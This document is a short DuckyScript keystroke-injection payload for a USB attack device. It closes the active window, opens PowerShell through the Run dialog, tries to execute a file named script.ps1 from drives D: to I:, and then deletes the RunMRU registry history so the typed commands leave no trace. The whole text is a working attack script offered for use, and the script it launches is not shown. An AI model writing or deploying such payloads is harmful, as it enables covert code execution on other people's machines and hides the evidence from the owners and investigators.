DELAY 2000
ALT F4
DELAY 100
GUI r
DELAY 500
STRING powershell 
ENTER
DELAY 2000
STRING D:\script.ps1
ENTER
DELAY 200
STRING E:\script.ps1
ENTER
DELAY 200
STRING F:\script.ps1
ENTER
DELAY 200
STRING G:\script.ps1
ENTER
DELAY 200
STRING H:\script.ps1
ENTER
DELAY 200
STRING I:\script.ps1
ENTER
DELAY 200
STRING Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
ENTER
DELAY 750
STRING exit
ENTER
